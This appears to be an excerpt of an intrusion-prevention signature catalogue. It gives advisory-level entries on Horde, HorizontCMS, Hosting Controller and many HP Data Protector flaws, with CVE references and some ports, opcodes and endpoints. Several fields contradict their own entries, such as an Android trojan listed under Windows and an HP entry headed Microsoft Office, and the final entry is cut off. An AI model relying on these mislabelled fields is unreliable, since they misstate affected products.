
Hongtoutou-Adrd-Bot

About this vulnerability:	HongTouTou-ADRD Bot
Risk:	High
First detected in:	sgpkg-ips-622-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	HongTouTou
Type:	Code Injection
Description:	HongTouTou, also known as Android/Drad.A, is Trojan that targets Android devices. It accepts commands from and sends sensitive information to an external server.
Situation:	HTTP_CSH-Hongtoutou-Adrd-Bot-Traffic-Detected

Horde-Backdoor-Code-Execution

About this vulnerability:

A Horde Backdoor Code Execution vulnerability.

Risk:

High

First detected in:

sgpkg-ips-710-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Horde

Type:

Backdoor

Description:

An externally introduced backdoor in Horde 3.3.12, Horde Groupware 1.2.10, and Horde Groupware Webmail Edition 1.2.10, placed in the distributions between November 2011 to February 2012, in templates/javascript/open_calendar.js, which allows remote attackers to execute arbitrary PHP code.

Situation:

HTTP_CRL-Horde-Backdoor-Code-Execution

References:

CVE-2012-0209
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0209

OSVDB-79246
http://www.osvdb.org/79246

Horde-CSV-Import-Arbitrary-PHP-Code-Execution

About this vulnerability:

A vulnerability in Horde

Risk:

High

First detected in:

sgpkg-ips-1237-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Horde

Type:

PHP Injection

Description:

There exists a vulnerability in Horde, versions 2.1.4 and before, which allows remote attackers to execute arbitrary PHP code by uploading a malicious CSV file, due to the lack of proper character escaping.

Situation:

HTTP_CRL-Horde-CSV-Import-Arbitrary-PHP-Code-Execution

References:

CVE-2020-8518
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8518

Horde-Groupware-Webmail-Edition-Ingo-Filter-Cross-Site-Request-Forgery

About this vulnerability:

A vulnerability in Horde Project Groupware Webmail Edition

Risk:

High

First detected in:

sgpkg-ips-561-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Horde Groupware Webmail Edition

Type:

Input Validation

Description:

A Cross-Site Request Forgery (CSRF) vulnerability exists in Horde Groupware Webmail Edition. The vulnerabilities are due to insufficient Cross-Site Request Forgery protections. An attacker could exploit this vulnerability by convincing the user to follow a malicious link or visit an attacker-controlled website. A successful exploit could allow the attacker to submit arbitrary requests to the affected service via the affected web browser with the privileges of the user.

Situation:

HTTP_CS-Horde-Groupware-Webmail-Edition-Ingo-Filter-Cross-Site-Request-Forgery

References:

CVE-2013-6275
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6275

OSVDB-99042
http://www.osvdb.org/99042

Horde-Unserialize-PHP-Code-Execution

About this vulnerability:

A Horde Unserialize PHP Code Execution vulnerability.

Risk:

High

First detected in:

sgpkg-ips-699-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Horde

Type:

Input Validation

Description:

A vulnerability in Horde, versions before 5.1.1, which allow remote attackers to eecute arbitrary PHP code via a crafted serialized object in the _formvars form.

Situation:

HTTP_CRL_Horde-Unserialize-PHP-Code-Execution

References:

CVE-2014-1691
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1691

Horde-Webmail-Form-File-Upload

About this vulnerability:

A vulnerability in Horde Webmail

Risk:

High

First detected in:

sgpkg-ips-1197-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Horde

Type:

Insecure Configuration

Description:

A vulnerability in Horde Groupware Webmail, versions 5.2.22 and 5.2.17, which allows remote attackers to execute arbitrary code through a vulnerable form that handles image uploads.

Situation:

HTTP_CRL-Horde-Webmail-Form-File-Upload

References:

CVE-2019-9858
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9858

Horde-Webmail-Turba_Factory_Driver-Insecure-Deserialization

About this vulnerability:

A vulnerability in Horde Webmail

Risk:

Moderate

First detected in:

sgpkg-ips-1478-5242

Last changed:

sgpkg-ips-1478-5242

Platform:

Generic

Software:

Horde

Type:

Input Validation

Description:

An insecure deserialization vulnerability exists in Horde Groupware Webmail Edition. This vulnerability is due to improper input validation of the source parameter used for fetching an address book configuration. A remote, authenticated attacker can exploit this vulnerability by sending a crafted request to a vulnerable server. Successful exploitation can result in arbitrary code execution under the security context of the affected server.

Situation:

HTTP_CRL-Horde-Webmail-Turba_Factory_Driver-Insecure-Deserialization

References:

CVE-2022-30287
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30287

HorizontCMS-Arbitrary-PHP-File-Upload

About this vulnerability:

A vulnerability in HorizontCMS

Risk:

High

First detected in:

sgpkg-ips-1298-5242

Last changed:

sgpkg-ips-1298-5242

Platform:

Linux; Windows

Software:

HorizontCMS

Type:

Input Validation

Description:

There exists a vulnerability in HorizontCMS, version 1.0.0-beta, which allows remote attackers to upload arbitrary php files and execute commands via a POST to /admin/file-manager/fileupload.

Situation:

HTTP_CS-HorizontCMS-Arbitrary-PHP-File-Upload

References:

CVE-2020-27387
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-27387

Hosting-Controller-FilePath-Parameter-File-Disclosure

About this vulnerability:

File disclosure vulnerability in Hosting Controller

Risk:

Low

First detected in:

sgpkg-ips-18-1210

Last changed:

sgpkg-ips-1637-5242

Platform:

Windows

Software:

Hosting Controller

Type:

Malfunction

Description:

Hosting Controller administrative hosting tool for Microsoft Windows could allow a remote authenticated attacker to obtain sensitive information. A remote attacker could send a specially-crafted HTTP request to the Statsbrowse.asp or Generalbrowser.asp script to view arbitrary files on the system.

References:

CVE-2004-1217
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1217

BID-11822
http://www.securityfocus.com/bid/11822

Hotbar

About this vulnerability:	Hotbar Internet Explorer Toolbar
Risk:	Low
First detected in:	sgpkg-ips-35-1210
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	Hotbar
Type:	Misconfiguration
Description:	Hotbar is an Internet Explorer toolbar that may show advertisement popups. It is bundled with for example the BeatShare file sharing software. Some organizations may consider the Hotbar software unwanted.
Situation:	HTTP_CSU-Hotbar-Activity HTTP_CSH-Hotbar-Install HTTP_CSH-Hotbar-Activity HTTP_CSH-Hotbar-Weather-Service-Activity

HP-Aio-Archive-Query-Server-Oasoa.exe-Stack-Buffer-Overflow

About this vulnerability:

A vulnerability in HP Application Information Optimizer

Risk:

Moderate

First detected in:

sgpkg-ips-569-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

HP Application Information Optimizer

Type:

Buffer Overflow

Description:

A stack buffer overflow vulnerability exists in HP Application Information Optimizer. The vulnerability exists in oasoa.exe which listens by default on port 19988. The vulnerability is due to insufficient sanitization on the range of the opcode value. A remote unauthenticated attacker can leverage this vulnerability by sending crafted messages to the server. This can lead to arbitrary code execution within the SYSTEM context.

Situation:

Generic_CS-HP-Aio-Archive-Query-Server-Oasoa.exe-Stack-Buffer-Overflow

References:

CVE-2013-6189
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6189

OSVDB-101564
http://www.osvdb.org/101564

HP-Application-Lifecycle-Management-ActiveX-Control-Arbitrary-File-Overwrite

About this vulnerability:

A vulnerability in HP Lifecycle Management ActiveX

Risk:

Moderate

First detected in:

sgpkg-ips-475-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

HP Lifecycle Management ActiveX

Type:

Directory Traversal

Description:

A directory traversal and file overwrite vulnerability exists in the HP Application Lifecycle Management ActiveX control XGO.ocx. The vulnerability is caused by exposing the CopyToFile function which fails to validate the filename parameter and allows the overwriting of system files. An attacker could exploit this vulnerability by enticing a user to open a specially crafted web page. Successful exploitation could result in code execution in the context of the currently logged in user.

Situation:

File-Text_HP-App-Lifecycle-Management-ActiveX-Control-Arbitrary-File-Overwrite

References:

OSVDB-85059
http://www.osvdb.org/85059

HP-Application-Lifecycle-Management-ActiveX-Insecure-Method-Exposure

About this vulnerability:

A vulnerability in HP Lifecycle Management ActiveX

Risk:

Moderate

First detected in:

sgpkg-ips-477-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

HP Lifecycle Management ActiveX

Type:

Malfunction

Description:

There is an insecure method exposure vulnerability in HP Application Lifecycle Management ActiveX control XGO.ocx. The vulnerability is caused by SetShapeNodeType function which exposes a parameter that can be used to control a function pointer. An attacker could exploit this vulnerability by enticing a user to open a specially crafted web page. Successful exploitation could result in code execution in the context of the currently logged in user.

Situation:

File-Text_HP-Application-Lifecycle-Management-ActiveX-Insecure-Method-Exposure

References:

OSVDB-85152
http://www.osvdb.org/85152

HP-Data-Protector-Backup-Client-Get-File-Buffer-Overflow

About this vulnerability:

An attempt to exploit a vulnerability in HP Data Protector

Risk:

Moderate

First detected in:

sgpkg-ips-394-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

HP Data Protector

Type:

Buffer Overflow

Description:

A code execution vulnerability exists in HP Data Protector Backup Client Service. The vulnerability is due to a buffer overflow in the processing of GET_FILE messages. Remote unauthenticated attackers could exploit this vulnerability by sending a crafted request to the target service.

Situation:

Generic_CS-HP-Data-Protector-Backup-Client-Get-File-Buffer-Overflow
Generic_CS-HP-Data-Protector-Backup-Client-Get-File-Buffer-Overflow-2

References:

CVE-2011-1729
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1729

BID-47638
http://www.securityfocus.com/bid/47638

OSVDB-72188
http://www.osvdb.org/72188

HP-Data-Protector-Backup-Client-Get-File-Directory-Traversal

About this vulnerability:

An attempt to exploit a vulnerability in HP Data Protector

Risk:

Moderate

First detected in:

sgpkg-ips-394-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

HP Data Protector

Type:

Input Validation

Description:

A directory traversal vulnerability exists in HP Data Protector Backup Client Service. The vulnerability is due to insufficient sanitization in the processing of the GET_FILE messages. Remote unauthenticated attackers could exploit this vulnerability by sending a crafted request message to the target service.

Situation:

Generic_CS-HP-Data-Protector-Backup-Client-Get-File-Directory-Traversal

References:

CVE-2011-1736
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1736

BID-47638
http://www.securityfocus.com/bid/47638

OSVDB-72195
http://www.osvdb.org/72195

HP-Data-Protector-Backup-Client-Service-Exec_Setup-Code-Execution

About this vulnerability:

A vulnerability in HP Data Protector

Risk:

High

First detected in:

sgpkg-ips-410-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

HP Data Protector

Type:

Malfunction

Description:

A code execution vulnerability exists in HP Data Protector Client agent software. The vulnerability is due to a design weakness in the processing of the EXEC_SETUP messages. Remote unauthenticated attackers could exploit this vulnerability by sending a crafted command to the target service. Successful exploitation would allow attackers to load and execute arbitrary programs from a remote SMB share with the privileges of the affected service application which runs under the SYSTEM user on Windows platform. The vendor has not provided any patch as of yet. As a workaround, allow only trusted users to access the vulnerable systems.

Situation:

Generic_CS-HP-Data-Protector-Backup-Client-Service-Exec_Setup-Code-Execution

References:

CVE-2011-0922
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0922

BID-46234
http://www.securityfocus.com/bid/46234

HP-Data-Protector-Client-Exec_Cmd-Perl-Command-Execution

About this vulnerability:

A vulnerability in Microsoft Office

Risk:

Moderate

First detected in:

sgpkg-ips-394-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

HP Data Protector

Type:

Malfunction

Description:

A remote code execution vulnerability has been reported in the HP Data Protector Client. The vulnerability is due to insufficient input validation of arguments passed to the EXEC_CMD command. A remote unauthenticated attacker could exploit this vulnerability by sending specially crafted input to the EXEC_CMD command.

Situation:

Generic_CS-HP-Data-Protector-Client-Exec_Cmd-Perl-Command-Execution
Generic_CS-HP-Data-Protector-Directory-Traversal

References:

CVE-2011-0923
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0923

BID-46234
http://www.securityfocus.com/bid/46234

OSVDB-72526
http://www.osvdb.org/72526

HP-Data-Protector-Crs-Multiple-Opcodes-Stack-Buffer-Overflow

About this vulnerability:

A vulnerability in HP Data Protector

Risk:

Moderate

First detected in:

sgpkg-ips-539-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

HP Data Protector

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in HP Data Protector. The vulnerability exists in the Cell Request Service (CRS.exe), which listens on a randomly chosen port. The application fails to sanitize input with opcodes 207, 210, 236, 243, and 265 which can result in a stack buffer overflow. A remote, unauthenticated attacker can exploit this vulnerability by sending a crafted request to the vulnerable service. Successful exploitation can result in arbitrary code execution in the context of the affected service, which is Administrator by default.

Situation:

Generic_CS-HP-Data-Protector-Crs-Multiple-Opcodes-Stack-Buffer-Overflow

References:

CVE-2013-2324
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2324

OSVDB-93858
http://www.osvdb.org/93858

HP-Data-Protector-Crs-Multiple-Stack-Buffer-Overflows

About this vulnerability:

A vulnerability in HP Data Protector

Risk:

Moderate

First detected in:

sgpkg-ips-568-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

HP Data Protector

Type:

Buffer Overflow

Description:

Multiple stack buffer overflows exist in HP Data Protector. The vulnerabilities are due to a lack of input sanitization on Strings provided with various opcodes. The strings are not validated for length before being copied into a fixed-size stack buffer. A remote unauthenticated attacker could exploit these vulnerabilities by sending a crafted request to the vulnerable service. Successful exploitation could cause a stack buffer overflow resulting in code execution in the context of the the affected service, which is SYSTEM by default.

Situation:

Generic_CS-HP-Data-Protector-Crs-Multiple-Stack-Buffer-Overflows

References:

CVE-2013-6195
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6195

OSVDB-101631
http://www.osvdb.org/101631

HP-Data-Protector-Crs-Opcode-1091-Stack-Buffer-Overflow

About this vulnerability:

A vulnerability in HP Data Protector

Risk:

Moderate

First detected in:

sgpkg-ips-532-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

HP Data Protector

Type:

Buffer Overflow

Description:

A stack buffer overflow has been discovered in HP Data Protector. The vulnerability exists in the CRS.exe service, which listens on a randomly chosen port. The application fails to sanitize input with the opcode 1091, which can result in a stack buffer overflow. A remote, unauthenticated attacker can exploit this vulnerability by sending a crafted request to the vulnerable service. Successful exploitation can result in arbitrary code execution in the context of the affected service, which is Administrator by default.

Situation:

Generic_CS-HP-Data-Protector-Crs-Opcode-1091-Stack-Buffer-Overflow

References:

CVE-2013-2334
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2334

OSVDB-93868
http://www.osvdb.org/93868

HP-Data-Protector-Crs-Opcode-1092-Stack-Buffer-Overflow

About this vulnerability:

A vulnerability in HP Data Protector

Risk:

Moderate

First detected in:

sgpkg-ips-529-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

HP Data Protector

Type:

Buffer Overflow

Description:

A stack buffer overflow has been discovered in HP Data Protector. The vulnerability exists in the CRS.exe services, which listens on a randomly chosen port. The application fails to sanitize input with opcode 1092, which can result in a stack buffer overflow. A remote, unauthenticated attacker can exploit this vulnerability by sending a crafted request to the vulnerable service. Successful exploitation can result in arbitrary code execution in the context of the affected service, which is Administrator by default.

Situation:

Generic_CS-HP-Data-Protector-Crs-Opcode-1092-Stack-Buffer-Overflow

References:

CVE-2013-2331
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2331

OSVDB-93865
http://www.osvdb.org/93865

HP-Data-Protector-Crs-Opcode-211-Stack-Buffer-Overflow

About this vulnerability:

A vulnerability in HP Data Protector

Risk:

Moderate

First detected in:

sgpkg-ips-531-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

HP Data Protector

Type:

Buffer Overflow

Description:

A stack buffer overflow has been discovered in HP Data Protector. The vulnerability exists in the CRS.exe service, which listens on a randomly chosen port. The application fails to sanitize input with opcode 211, which can result in a stack buffer overflow. A remote, unauthenticated attacker can exploit this vulnerability by sending a crafted request to the vulnerable service. Successful exploitation can result in arbitrary code execution in the context of the affected service, which is Administrator by default.

Situation:

Generic_CS-HP-Data-Protector-Crs-Opcode-211-Stack-Buffer-Overflow

References:

CVE-2013-2333
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2333

OSVDB-93867
http://www.osvdb.org/93867

HP-Data-Protector-Crs-Opcode-215-And-263-Stack-Buffer-Overflow

About this vulnerability:

A vulnerability in HP Data Protector

Risk:

Moderate

First detected in:

sgpkg-ips-533-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

HP Data Protector

Type:

Buffer Overflow

Description:

Two stack buffer overflows have been discovered in HP Data Protector. The vulnerabilities exists in the CRS.exe service, which listens on a randomly chosen port. The application fails to sanitize input with opcode 215 or 263, which can result in two stack buffer overflows. A remote, unauthenticated attacker can exploit this vulnerability by sending a crafted request to the vulnerable service. Successful exploitation can result in arbitrary code execution in the context of the affected service, which is Administrator by default.

Situation:

Generic_CS-HP-Data-Protector-Crs-Opcode-215-And-263-Stack-Buffer-Overflow

References:

CVE-2013-2328
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2328

OSVDB-93862
http://www.osvdb.org/93862

HP-Data-Protector-Crs-Opcode-227-Stack-Buffer-Overflow

About this vulnerability:

A vulnerability in HP Data Protector

Risk:

Moderate

First detected in:

sgpkg-ips-534-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

HP Data Protector

Type:

Buffer Overflow

Description:

A stack buffer overflow vulnerability has been discovered in HP Data Protector. The vulnerability exists in the Cell Request Service (crs.exe), which listens on a randomly chosen port. The application fails to sanitize input with opcode 227, which can result in a stack buffer overflow. A remote, unauthenticated attacker can exploit this vulnerability by sending a crafted request to the vulnerable service. Successful exploitation can result in arbitrary code execution in the context of the affected service, which is Administrator by default.

Situation:

Generic_CS-HP-Data-Protector-Crs-Opcode-227-Stack-Buffer-Overflow

References:

CVE-2013-2335
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2335

BID-60311
http://www.securityfocus.com/bid/60311

OSVDB-93869
http://www.osvdb.org/93869

HP-Data-Protector-Crs-Opcode-234-Stack-Buffer-Overflow

About this vulnerability:

A vulnerability in HP Data Protector

Risk:

Moderate

First detected in:

sgpkg-ips-535-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

HP Data Protector

Type:

Buffer Overflow

Description:

There is a buffer overflow in HP Data Protector. The vulnerability exists in the Cell Request Service (crs.exe), which listens on a randomly chosen port. The application fails to sanitize input with opcode 234, which can result in a stack buffer overflow. A remote, unauthenticated attacker can exploit this vulnerability by sending a crafted request to the vulnerable service. Successful exploitation can result in arbitrary code execution in the context of the affected service, which is Administrator by default.

Situation:

Generic_CS-HP-Data-Protector-Crs-Opcode-234-Stack-Buffer-Overflow

References:

CVE-2013-2326
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2326

OSVDB-93860
http://www.osvdb.org/93860

HP-Data-Protector-Crs-Opcode-235-Stack-Buffer-Overflow

About this vulnerability:

A vulnerability in HP Data Protector

Risk:

Moderate

First detected in:

sgpkg-ips-535-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

HP Data Protector

Type:

Buffer Overflow

Description:

A stack buffer overflow has been discovered in HP Data Protector. The vulnerability exists in the Cell Request service (crs.exe), which listens on a randomly chosen port. The application fails to sanitize input with opcode 235, which can result in a stack buffer overflow. A remote, unauthenticated attacker can exploit this vulnerability by sending a crafted request to the vulnerable service. Successful exploitation can result in arbitrary code execution in the context of the affected service, which is Administrator by default.

Situation:

Generic_CS-HP-Data-Protector-Crs-Opcode-235-Stack-Buffer-Overflow

References:

CVE-2013-2325
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2325

OSVDB-93859
http://www.osvdb.org/93859

HP-Data-Protector-Crs-Opcode-259-Stack-Buffer-Overflow

About this vulnerability:

A vulnerability in HP Data Protector

Risk:

Moderate

First detected in:

sgpkg-ips-530-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

HP Data Protector

Type:

Buffer Overflow

Description:

A stack buffer overflow has been discovered in HP Data Protector. The vulnerability exists in the CRS.exe service, which listens on a randomly chosen port. The application fails to sanitize input with opcode 259, which can result in a stack buffer overflow. A remote, unauthenticated attacker can exploit this vulnerability by sending a crafted request to the vulnerable service. Successful exploitation can result in arbitrary code execution in the context of the affected service, which is Administrator by default.

Situation:

Generic_CS-HP-Data-Protector-Crs-Opcode-259-Stack-Buffer-Overflow

References:

CVE-2013-2329
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2329

OSVDB-93863
http://www.osvdb.org/93863

HP-Data-Protector-Crs-Opcode-260-Stack-Buffer-Overflow

About this vulnerability:

A vulnerability in HP Data Protector

Risk:

Moderate

First detected in:

sgpkg-ips-538-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

HP Data Protector

Type:

Buffer Overflow

Description:

A stack buffer overflow has been discovered in HP Data Protector. The vulnerability exists in the Cell Request service (crs.exe), which listens on a randomly chosen port. The application fails to sanitize input with opcode 260, which can result in a stack buffer overflow. A remote, unauthenticated attacker can exploit this vulnerability by sending a crafted request to the vulnerable service. Successful exploitation can result in arbitrary code execution in the context of the affected service, which is Administrator by default.

Situation:

Generic_CS-HP-Data-Protector-Crs-Opcode-260-Stack-Buffer-Overflow

References:

CVE-2013-2332
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2332

OSVDB-93866
http://www.osvdb.org/93866

HP-Data-Protector-Crs-Opcode-264-Stack-Buffer-Overflow

About this vulnerability:

A vulnerability in HP Data Protector

Risk:

Moderate

First detected in:

sgpkg-ips-535-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

HP Data Protector

Type:

Buffer Overflow

Description:

A stack buffer overflow has been discovered in HP Data Protector. The vulnerability exists in the Cell Request service (crs.exe), which listens on a randomly chosen port. The application fails to sanitize input with opcode 264, which can result in a stack buffer overflow. A remote, unauthenticated attacker can exploit this vulnerability by sending a crafted request to the vulnerable service. Successful exploitation can result in arbitrary code execution in the context of the affected service, which is Administrator by default.

Situation:

Generic_CS-HP-Data-Protector-Crs-Opcode-264-Stack-Buffer-Overflow

References:

CVE-2013-2327
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2327

OSVDB-93861
http://www.osvdb.org/93861

HP-Data-Protector-Crs-Opcode-305-Stack-Buffer-Overflow

About this vulnerability:

A vulnerability in HP Data Protector

Risk:

Moderate

First detected in:

sgpkg-ips-531-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

HP Data Protector

Type:

Buffer Overflow

Description:

A stack buffer overflow vulnerability has been discovered in HP Data Protector. The vulnerability exists in the Cell Request service, which listens on a randomly chosen port. The application fails to sanitize input with opcode 305, which can result in a stack-based buffer overflow. A remote, unauthenticated attacker can exploit this vulnerability by sending a crafted request to the vulnerable service. Successful exploitation can result in arbitrary code execution in the context of the affected service, which is System on Windows systems by default.

Situation:

Generic_CS-HP-Data-Protector-Crs-Opcode-305-Stack-Buffer-Overflow

References:

CVE-2013-2330
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2330

OSVDB-93864
http://www.osvdb.org/93864

HP-Data-Protector-Exec_Bar-Command-Execution

About this vulnerability:

A vulnerability in HP Data Protector

Risk:

Moderate

First detected in:

sgpkg-ips-567-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

HP Data Protector

Type:

Input Validation

Description:

A command execution vulnerability exists in HP Data Protector. The vulnerability is due to a lack of input sanitization on a string provided with Opcode 11. The string is not sanitized before being used in a call to CreateProcess. A remote unauthenticated attacker could exploit this vulnerability by sending a crafted request to the vulnerable service. Successful exploitation could result in command execution in the context of the affected service, which is SYSTEM by default.

Situation:

Generic_CS-HP-Data-Protector-Exec_Bar-Command-Execution

References:

CVE-2013-2347
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2347

OSVDB-101626
http://www.osvdb.org/101626

HP-Data-Protector-Express-DtbClsLogin-Stack-Buffer-Overflow

About this vulnerability:

Buffer overflow vulnerability in HP Data Protector Express

Risk:

Critical

First detected in:

sgpkg-ips-345-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Any Operating System

Software:

HP OpenView Data Protector Application Recovery Manager

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in HP Data Protector Express.

Situation:

Generic_CS-HP-Data-Protector-Express-DtbClsLogin-Stack-Buffer-Overflow

References:

CVE-2010-3007
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3007

BID-43105
http://www.securityfocus.com/bid/43105

OSVDB-67973
http://www.osvdb.org/67973

HP-Data-Protector-Express-Multiple-Stack-Buffer-Overflows

About this vulnerability:

A vulnerability in HP Data Protector Express

Risk:

High

First detected in:

sgpkg-ips-465-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

HP Data Protector Express

Type:

Buffer Overflow

Description:

There is a stack buffer overflow in HP Data Protector Express. The vulnerability is due to insufficient validation of incoming messages with various opcodes. A remote, unauthenticated attacker can exploit the vulnerability by sending a malformed message with one of the affected opcodes to the server. Successful exploitation would lead to execution of arbitrary attacker code in the security context of the affected application, which is SYSTEM. If the attack fails, the application may crash resulting in a denial-of-service condition.

Situation:

Generic_CS-HP-Data-Protector-Express-Multiple-Stack-Buffer-Overflows

References:

CVE-2012-0121
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0121

BID-52431
http://www.securityfocus.com/bid/52431

OSVDB-80102
http://www.osvdb.org/80102

HP-Data-Protector-Express-Stack-Based-Buffer-Overflow

About this vulnerability:

An attempt to exploit a vulnerability in HP Data Protector Express detected

Risk:

High

First detected in:

sgpkg-ips-656-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

HP Data Protector Express

Type:

Buffer Overflow

Description:

A stack based buffer overflow vulnerability in HP Data Protector Express, 5.0.00 before build 59287 and 6.0.00 before build 11974, in the insecure way that folders are created, which allows remote attackers to execute arbitrary code or cause a denial of service condition.

Situation:

Generic_CS-HP-Data-Protector-Express-Stack-Based-Buffer-Overflow

References:

CVE-2012-0124
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0124

BID-52431
http://www.securityfocus.com/bid/52431

OSVDB-80105
http://www.osvdb.org/80105

HP-Data-Protector-Manager-MMD-Service-Stack-Buffer-Overflow

About this vulnerability:

A buffer overflow vulnerability in HP Data Protector manager server

Risk:

Critical

First detected in:

sgpkg-ips-373-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Any Operating System

Software:

HP Data Protector Media Operations

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in HP Data Protector manager server. A remote unauthenticated attacker can exploit this vulnerability by sending a crafted packet to the vulnerable service to execute arbitrary programs with the privileges of the affected service.

Situation:

Generic_CS-HP-Data-Protector-Manager-MMD-Service-Stack-Buffer-Overflow
Generic_CS-HP-Data-Protector-Manager-MMD-Service-Stack-DOS

References:

BID-45128
http://www.securityfocus.com/bid/45128

HP-Data-Protector-Manager-RDS-Denial-Of-Service

About this vulnerability:

A vulnerability in HP Data Protector

Risk:

High

First detected in:

sgpkg-ips-374-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

HP Data Protector

Type:

Malfunction

Description:

There is a denial of service vulnerability in HP Data Protector Manager RDS service. The vulnerability is due to a design error while handling packets containing an overly large size value. Remote unauthenticated attackers could exploit this vulnerability by sending a crafted packet to the vulnerable service on the target server. Successful exploitation would terminate the RDS service.

Situation:

Generic_CS-HP-Data-Protector-Manager-RDS-Denial-Of-Service

References:

CVE-2011-0514
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0514

BID-45725
http://www.securityfocus.com/bid/45725

OSVDB-70617
http://www.osvdb.org/70617

HP-Data-Protector-Media-Operations-Denial-Of-Service

About this vulnerability:	A vulnerability in HP Data Protector Media Operations
Risk:	High
First detected in:	sgpkg-ips-378-4219
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	HP Data Protector Media Operations
Type:	Malfunction
Description:	A denial of service vulnerability exists in HP Data Protector Media Operations. The flaw is due to a null pointer dereference error in DBServer.exe when parsing malformed requests sent to a target server. A remote unauthenticated attacker can exploit this vulnerability by sending a maliciously crafted request to the target server over TCP (default port 19813). Successful exploitation will cause the target service to terminate abnormally resulting in a denial of service condition.
Situation:	Generic_CS-HP-Data-Protector-Media-Operations-Denial-Of-Service

HP-Data-Protector-Media-Operations-Directory-Traversal

About this vulnerability:

A vulnerability in HP Data Protector Media Operations

Risk:

Moderate

First detected in:

sgpkg-ips-426-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

HP Data Protector Media Operations

Type:

Directory Traversal

Description:

A directory traversal vulnerability has been reported in HP Data Protector Media Operations. The vulnerability is due to insufficient validation of incoming requests. A remote, unauthenticated attacker can exploit this vulnerability by sending a specially crafted message to port 19813/TCP of the server running the vulnerable product. In the case of successful exploitation, the vulnerability allows downloading of arbitrary files from the drive on which the product is installed.

Situation:

Generic_CS-HP-Data-Protector-Media-Operations-Directory-Traversal

References:

OSVDB-76841
http://www.osvdb.org/76841

HP-Data-Protector-Media-Operations-Memory-Corruption

About this vulnerability:

A vulnerability in HP Data Protector Media Operations

Risk:

Moderate

First detected in:

sgpkg-ips-424-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

HP Data Protector Media Operations

Type:

Malfunction

Description:

